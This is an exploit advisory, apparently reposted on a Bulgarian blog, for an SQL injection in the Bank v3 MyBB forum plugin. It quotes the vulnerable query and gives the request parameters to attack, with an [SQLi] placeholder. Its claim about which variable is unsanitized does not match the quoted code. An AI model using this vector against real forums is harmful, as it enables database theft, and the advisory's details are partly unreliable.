# Exploit Title: Bank v3 MyBB plugin SQLi 0day
# Exploit Author: Red_Hat [NullSec]
# Software Link: http://mods.mybb.com/download/bank-v3
# Tested on: Windows & Linux.

Vulnerable code :

     $query_r=$db->query("SELECT * FROM ".TABLE_PREFIX."users WHERE username='$user'");

The variable '$mybb->input['id']' remains unsanitized.

Usage : 
/GET transactions=send
/POST r_pay=Red_Hat&r_username=[SQLi]

Shoutout to Zixem <3 & NullSec :3
Rate this post
Брой прочитания на тази страница: 553
MyBB Bank-v3 Plugin SQL Injection
Tagged on:

Вашият коментар

Вашият имейл адрес няма да бъде публикуван. Задължителните полета са отбелязани с *